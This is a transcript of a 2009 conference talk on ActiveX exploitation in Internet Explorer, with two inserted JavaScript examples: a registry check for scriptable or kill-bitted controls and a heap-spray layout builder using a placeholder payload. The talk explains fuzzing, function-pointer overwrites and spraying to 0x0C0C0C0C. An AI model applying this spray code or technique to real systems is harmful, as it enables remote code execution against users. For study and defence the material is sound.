ActiveX Xploitation In 2009


Transcript of ActiveX Xploitation In 2009

Page 1: ActiveX  Xploitation  In 2009

ActiveX Xploitation In 2009

Page 2: Who The Hell Am I?

Hi, my name is Paul Craig. Principal Security Consultant, Security-Assessment.com. "I hack things." Google me (I have hacked lots of things).

Page 3: Agenda

What Is ActiveX & How Does it Work

ActiveX Vulnerabilities

Finding ActiveX Vulnerabilities

Why Everything Is Different With IE 8

Shell Poppin’

Page 4: What Is ActiveX?

ActiveX is part of COM, the Component Object Model, which also includes OLE, OLE Automation, COM+ and DCOM. COM is a language-neutral method of implementing objects, so that objects can easily be reused by other applications.

In 1996 Microsoft renamed its Internet OLE controls 'ActiveX'. ActiveX was designed as the Internet component of COM; it is widely used throughout the Windows environment and has become the most popular component of COM.

Page 5: CLSIDs and ProgIDs

COM objects are referenced by a ClassID (CLSID) or a ProgID. A CLSID is a 128-bit unique identifier for a software component, e.g. CLSID = {AE7AB96B-FF5E-4dce-801E-14DF2C4CD681}. A Programmatic Identifier (ProgID) is a human-readable name, e.g. WMP11.AssocFile.

Controls must be registered before use (regsvr32.exe control.dll).

ActiveX controls can be loaded by IE with an object tag:
<object classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">

IE uses the COM function CoCreateInstance(), which creates a single uninitialized object of the class associated with the specified CLSID.

Page 6: Interfaces and Methods

COM is based on object-oriented programming: COM objects expose interfaces, and interfaces expose methods. Methods are the equivalent of functions in procedural programming.

Object.Interface.Method(), e.g. MSNETOBJ.IRMGetLicense.GetLicenseFromURL('http://www...')

Page 7: COM Objects Are Not Typical DLL Libraries

The 'exported functions' of a standard DLL are not how a COM server is used: a COM DLL exports only a few standard entry points (DllRegisterServer, DllGetClassObject and friends). The control's own methods are not exported at all; they are reached through the interface vtables of objects handed out by DllGetClassObject, abstracted from native operations.

Page 8: ActiveX  Xploitation  In 2009

All CLSIDs on Windows can be found at HKEY_CLASSES_ROOT\CLSID Which is an alias to HKEY_LOCAL_MACHINE\Software\

Classes\CLSID

ActiveX Controls Have Opt-In Security Categories For IE. Safe For Initialisation. Safe For Scripting.

Category Membership Found At: HKEY_CLASSES_ROOT\CLSID\{CLSID}\Implemented

Categories 7DD95801-9882-11CF-9FA9-00AA06C42C4 = SFI 7DD95802-9882-11CF-9FA9-00AA06C42C4 = SFS

Not supported under Windows CE.

Page 9: ActiveX Security Measures

Safe For Initialization allows a control to be initialised with persistent data, supplied when the control is created. The input arrives through an IPersist* interface (for <param> tags, IPersistPropertyBag):
<object ...><param name=play value=test.wmv></object>

Safe For Scripting allows a control to be initialised and scripted with dynamic data. It is scripted from JavaScript/VBScript: the control can be accessed and its methods called freely at run time. Input is supplied through the IDispatch interface.

Page 10: IObjectSafety Interface

The control reports its own security level ("I am not safe to script!"). Internet Explorer queries the control's IObjectSafety interface before initialising or scripting it.

Object.IObjectSafety.GetInterfaceSafetyOptions()
INTERFACESAFE_FOR_UNTRUSTED_CALLER (0x1) = safe for scripting (SFS)
INTERFACESAFE_FOR_UNTRUSTED_DATA (0x2) = safe for initialisation with untrusted data (SFI)

SetInterfaceSafetyOptions() is also supported (the host uses it to ask the control to make itself safe for the intended use). IObjectSafety is the only security mechanism supported on Windows CE.

Page 11: Compatibility Flags and the Kill Bit

Internet Explorer 6 backward compatibility is supported through
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}\Compatibility Flags
COMPAT_SAFEFOR_LOADING = 0x00800000: "This compatibility flag can be used to disable the Internet Explorer 7 IObjectSafety check and revert back to Microsoft Internet Explorer 6 behaviour."

ActiveX kill bit: in the same Compatibility Flags value, 0x00000400 is the kill bit (the "evil bit"). Kill-bitted CLSIDs cannot be loaded by IE. Updated kill-bit lists are distributed through Windows Update.

Page 12: Querying an ActiveX Control

Using OLEView we can query an ActiveX control through its type library (TypeLib). Type libraries describe the contents of a COM component: exposed interfaces, methods, properties and constants, and the type definition of each method.

A TypeLib is either embedded in the ActiveX control's binary as a resource, shipped as an additional .TLB file, or not present at all.

Page 13: OleView Example

Page 14: ActiveX Exploitation Has Grown With Popularity

50 remote command execution bugs in ActiveX in 2006, versus 1 in 2001. Over 110 ActiveX exploits on MilW0rm.com. A popular attack path for browser exploitation: ActiveX controls run in the same process and security context as Internet Explorer. Hacking clients is the new 'in thing'.

Page 15: Why Is ActiveX So Insecure?

Compiler security disabled: SafeSEH turned off and /GS disabled in (most) controls. ActiveX controls use the default Windows heap allocator. Controls are not sandboxed and can manipulate COM/IE functionality.

ActiveX security controls are purely opt-in. Developers mark controls SFS and SFI when it is not required, and many controls were never designed to be scripted from IE. "There were only 7 days Internet Explorer was safe to use in the entire year of 2004."

ActiveX controls are shipped with commercial software, and users are not informed about control installation.

Page 16: ActiveX Bug Classes

ActiveX bugs can be classified into three groups: insecure method functionality, insecure object instantiation and insecure scripting.

#1 - Insecure Method Functionality: legitimately using a method of the control to do something malicious. Exploitable whether the control is SFI or SFS.

Friendly Technologies Dialler: Execute Arbitrary Commands

Page 17: Insecure Method Functionality, More Examples

PBEmail: Arbitrary File Overwrite (SFS + SFI)

WebLaunch: Arbitrary Command Execution (SFS + SFI)

Synactis All In The Box: Null Byte File Overwrite (SFS + SFI)

Page 18: #2 - Insecure Object Instantiation

An ActiveX control instantiated with malicious persistent input. The control need only be marked Safe For Initialization: user-supplied persistent values (<param> data) are used as control parameters.

These are common application development vulnerabilities: stack/heap overflows, integer overflows, format string vulnerabilities. Malformed input causes an application exception: a long string supplied to a method, a long string assigned to a control property, a large numeric value passed to a method.

Page 19: #3 - Insecure Scripting

The control is marked Safe For Scripting and an ActiveX method is scripted with malicious input: JavaScript/VBScript is used to interact with the control. Vulnerable to the same common application development vulnerabilities.

Page 20: Finding ActiveX Vulnerabilities

Query the ActiveX controls installed on the system. Look up the UUID (GUID) of the coclass in the type library. Search the registry for the GUID: is it SFS? It may still be SFS without an Implemented Categories entry, because a control can answer IObjectSafety itself; use axenum (part of AxFuzz) to enumerate IObjectSafety settings.
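An added example (written for this page, not code from the talk, AxFuzz or OLEView) that makes the registry checks from pages 8, 11 and 20 concrete: given a CLSID, decode the Implemented Categories entries and the Compatibility Flags bits and decide how IE will treat the control. The snapshot is a constructed in-memory copy of the relevant keys; the two CLSIDs are the ones the slides show, but their key contents here are invented, and the third CLSID is hypothetical. On a real machine the same paths would be read with WScript.Shell RegRead from JScript or Get-ItemProperty from PowerShell. The assessment logic and verdict strings are my own, and the caveat from page 20 carries over: the registry cannot tell you what the control's own IObjectSafety implementation answers, so a 'no category' result still needs axenum.

```javascript
// Component category GUIDs from page 8 (CATID_SafeForInitializing / CATID_SafeForScripting).
const CATID_SFI = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}";
const CATID_SFS = "{7DD95802-9882-11CF-9FA9-00AA006C42C4}";

// Bits of the "Compatibility Flags" DWORD from page 11.
const KILL_BIT = 0x00000400;               // IE refuses to load the CLSID
const COMPAT_SAFEFOR_LOADING = 0x00800000; // IE6 behaviour: IObjectSafety check skipped

const CLSID_ROOT = "HKCR\\CLSID\\";
const COMPAT_ROOT = "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\";

// Constructed registry snapshot: full key path -> value map (an empty map means
// the key exists with no values). Contents are made up for the example.
const snapshot = {
  // A control marked both SFI and SFS, with no compatibility entry at all.
  [CLSID_ROOT + "{22D6F312-B0F6-11D0-94AB-0080C74C7E95}"]: { "": "Example media control" },
  [CLSID_ROOT + "{22D6F312-B0F6-11D0-94AB-0080C74C7E95}\\Implemented Categories\\" + CATID_SFI]: {},
  [CLSID_ROOT + "{22D6F312-B0F6-11D0-94AB-0080C74C7E95}\\Implemented Categories\\" + CATID_SFS]: {},
  // A control marked SFS that was later kill-bitted.
  [CLSID_ROOT + "{AE7AB96B-FF5E-4DCE-801E-14DF2C4CD681}"]: { "": "Example vendor control" },
  [CLSID_ROOT + "{AE7AB96B-FF5E-4DCE-801E-14DF2C4CD681}\\Implemented Categories\\" + CATID_SFS]: {},
  [COMPAT_ROOT + "{AE7AB96B-FF5E-4DCE-801E-14DF2C4CD681}"]: { "Compatibility Flags": KILL_BIT },
  // A hypothetical control with no category entries but COMPAT_SAFEFOR_LOADING set.
  [CLSID_ROOT + "{00000000-0000-0000-0000-000000000001}"]: { "": "Example legacy control" },
  [COMPAT_ROOT + "{00000000-0000-0000-0000-000000000001}"]: { "Compatibility Flags": COMPAT_SAFEFOR_LOADING },
};

// Registry paths are case-insensitive; normalise both sides before comparing.
function lookup(reg, path) {
  const want = path.toUpperCase();
  for (const key of Object.keys(reg)) if (key.toUpperCase() === want) return reg[key];
  return undefined;
}

// Decide how IE will treat a CLSID from what the registry alone can tell us.
function assessControl(reg, clsid) {
  const c = clsid.toUpperCase();
  const base = CLSID_ROOT + c;
  const cats = base + "\\Implemented Categories\\";
  const registered = lookup(reg, base) !== undefined;
  const sfi = lookup(reg, cats + CATID_SFI) !== undefined;
  const sfs = lookup(reg, cats + CATID_SFS) !== undefined;
  const compat = lookup(reg, COMPAT_ROOT + c) || {};
  const flags = (compat["Compatibility Flags"] || 0) >>> 0;
  const killBit = (flags & KILL_BIT) !== 0;
  const safeForLoading = (flags & COMPAT_SAFEFOR_LOADING) !== 0;

  let verdict;
  if (!registered) verdict = "not registered";
  else if (killBit) verdict = "kill bit set: IE will not load it";
  else if (sfs) verdict = "SFS: scriptable from any web page";
  else if (sfi) verdict = "SFI only: takes <param> data, not scriptable";
  else if (safeForLoading) verdict = "no category but COMPAT_SAFEFOR_LOADING: IE6 behaviour, IObjectSafety check skipped";
  else verdict = "no category in registry: may still answer IObjectSafety, check with axenum";
  return { clsid: c, registered, sfi, sfs, killBit, safeForLoading, flags, verdict };
}

// Walk every CLSID in the snapshot the way an enumeration pass would.
function assessAll(reg) {
  const seen = new Set();
  for (const key of Object.keys(reg)) {
    const m = /^HKCR\\CLSID\\(\{[0-9A-F-]+\})/i.exec(key);
    if (m) seen.add(m[1].toUpperCase());
  }
  return [...seen].sort().map((c) => assessControl(reg, c));
}
```

The kill bit is tested before the categories on purpose: a control that is SFS in HKCR but kill-bitted in the ActiveX Compatibility key is dead to IE, so its categories no longer matter.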

Page 21: Fuzz the fuck out of it!

Fuzz the fuck out of it! I use COMBust: simple, effective, no false positives.

combust -c {GUID}

Overwritten function pointer.

Page 22: Easy Exploitation: Heap Spraying

Method pioneered by SkyLined, zenparse and Alex Sotirov. Used since 2004, still works. Use JavaScript to allocate (lots of) memory on the heap and so control the structure of the heap from JavaScript.

Overwrite a function pointer, SEH handler or return address, jump into the JavaScript-allocated heap and execute shellcode. Develop stack and heap overflow exploits fast.

Page 23: Empty Heap

Windows Address Space Layout Randomization: the heap is somewhere, we don't know where (32 possible base locations). If you can point EIP somewhere, where would you point?

Page 24: Filling the Heap

JavaScript allocates lots of copies of (NOP slide + shellcode). Under certain circumstances jscript.dll uses the common Windows heap allocator, so JavaScript can be used to allocate 'heaps of heaps'. Allocate enough of them and 0x0C0C0C0C will fall inside one of those blocks. Get EIP there and you win.

Page 25: "Heap Feng Shui": HeapLib.js

HeapLib.js: automated JavaScript heap manipulation. Supports IE 5-7 with an object-oriented JavaScript API. Supports heap logging and debugging, allocation and freeing of blocks with arbitrary sizes, and high-level heap manipulation (very easy): control the heap.

It takes only minutes to create an ActiveX exploit and pop a shell. Very easy; allows for lazy exploitation. Heap spraying lacks hacker finesse: "spray 0x0c0c0c0c everywhere until something goes there".
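An added example (my own, not from the talk, HeapLib.js or any published exploit) of the spray layout pages 22 to 25 describe, using the 0x0C sled byte from page 27, written so it runs and can be checked outside IE: it builds one sled+payload block sized to a whole 1 MiB heap allocation, works out how many copies it takes to reach past 0x0C0C0C0C, and checks which landing offsets inside a block actually slide into the payload. No shellcode is included: SHELLCODE is a constructed placeholder, STRING_OVERHEAD is an assumed figure for the JScript string header, and the slack in blocksNeeded() is a judgement call; the 0x0C sled, the end-of-block payload placement, the substring() copy and the doubling loop are the technique itself.

```javascript
const SPRAY_TARGET = 0x0C0C0C0C;  // where a clobbered function pointer is aimed
const SLED_UNIT = "\u0c0c\u0c0c"; // 4 bytes of 0x0C; each 0C 0C pair decodes as OR AL,0x0C
const BLOCK_BYTES = 0x100000;     // 1 MiB: big enough to come straight from the Windows heap
const STRING_OVERHEAD = 0x24;     // assumed: bytes the JScript string header/terminator use
const SHELLCODE = "\u9090\u9090\uCCCC"; // constructed placeholder (NOPs + INT3), not real shellcode

// Build one spray block: a sled of 0x0C bytes followed by the payload, so that
// landing anywhere in the sled runs forward into the payload.
function buildSledBlock(payload, blockBytes, overhead) {
  const payloadChars = (blockBytes - overhead) / 2;   // JScript strings are UTF-16
  const sledChars = payloadChars - payload.length;
  let sled = SLED_UNIT;
  while (sled.length < sledChars) sled += sled;       // double, never append char by char
  sled = sled.substring(0, sledChars);
  const block = sled + payload;
  // Page 26: a literal is not on the OS heap, a substring() result is.
  return block.substring(0, block.length);
}

// How many blocks to allocate so the spray reaches past the target address.
// The heap base is unknown (one of 32 under ASLR) but low, so filling from the
// bottom of the address space up to the target plus some slack covers it.
function blocksNeeded(target, blockBytes, slack) {
  return Math.ceil(target / blockBytes) + slack;
}

// Allocate the blocks; in IE (page 26) each substring() copy is a fresh heap allocation.
function spray(block, count) {
  const heap = [];
  for (let i = 0; i < count; i++) heap.push(block.substring(0, block.length));
  return heap;
}

// OR AL,0x0C is a two-byte instruction, so execution enters the payload at its
// first byte only when an even number of sled bytes remain after the landing
// point; land one byte off and the payload is entered one byte in.
function sledReachesPayload(sledBytes, landingOffset) {
  if (landingOffset < 0 || landingOffset > sledBytes) return false;
  return (sledBytes - landingOffset) % 2 === 0;
}

// Summarise the plan for the constants above.
function describeSpray() {
  const block = buildSledBlock(SHELLCODE, BLOCK_BYTES, STRING_OVERHEAD);
  const sledBytes = (block.length - SHELLCODE.length) * 2;
  const count = blocksNeeded(SPRAY_TARGET, BLOCK_BYTES, 16);
  return {
    blockChars: block.length,
    blockBytes: block.length * 2 + STRING_OVERHEAD,
    sledBytes,
    blocks: count,
    sprayedMiB: (count * BLOCK_BYTES) / 0x100000,
    evenLandingOk: sledReachesPayload(sledBytes, 0x0C0C),
    oddLandingOk: sledReachesPayload(sledBytes, 0x0C0D),
  };
}
```

The parity check is the detail the slides gloss over: 0x0C0C0C0C is an even address and the sled length is even, so a pointer that lands exactly on the target decodes cleanly, but an off-by-one landing inside the sled starts the payload one byte late. That is why real sprays begin the payload with bytes that tolerate a one-byte skew.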

Page 26: Why Does Heap Spraying Work?

The heap (data pages) is executable in the IE 7 process: DEP is *NOT* enabled for IE 5-7. Certain JavaScript strings are stored on the shared Windows heap: var test = "aaa"; is not on the OS heap, whereas var test = test.substring(0, test.length); is.

(Most) ActiveX controls use the generic Windows heap allocator, so an ActiveX heap overflow overflows into the IE/COM heap. COM is written in (Visual) C++ and makes use of thousands of function pointers (vtables), so heap overflows often lead to function pointer overwrites.

Page 27: Function Pointers

COM makes use of lots of function pointers, and they are kept on the heap. You blindly overflow these function pointers with the location of your heap spray, 0x0C0C0C0C. The byte pair 0x0C 0x0C decodes as OR AL, 0x0C, a NOP-like instruction, so sprayed memory can be executed, read and jumped to.

JavaScript allocates (lots of) memory so that the address 0x0C0C0C0C is covered by the spray. Many COM function pointers are overflowed with 0x0C0C0C0C; an overwritten function pointer is called by COM; the code at 0x0C0C0C0C is executed; you pop a shell.

Page 28: It All Changes With IE 8

Internet Explorer 7 opts out of DEP due to plug-in compatibility: Flash and Java did not support DEP. Internet Explorer 8 enables DEP by default, and Flash and Java now support it. DEP disables code execution from the heap, and the new jscript.dll keeps its strings on a heap that is marked not executable. "Ahem, that will not work in IE 8."

Anyone can install ActiveX controls in IE8 (not just administrators): per-user installation. Unsafe methods will still be exploitable. The "Click this control to activate it" prompt has been removed.

Page 29: SiteLock

SiteLock (the ATL SiteLock template) protects a control from being loaded from arbitrary websites: the control's IObjectSafety implementation checks the URL of the hosting site and only reports itself safe for an allow-list of domains, so controls implement their own per-site control. Separately, IE8's per-site ActiveX lets users allow a control for a specific Web site, for all Web sites, or disallow the control.

Page 30: Shell Poppin'

Demo: find an ActiveX vulnerability, exploit it through heap spraying, pop shell.

Easy.

All hail the demo god.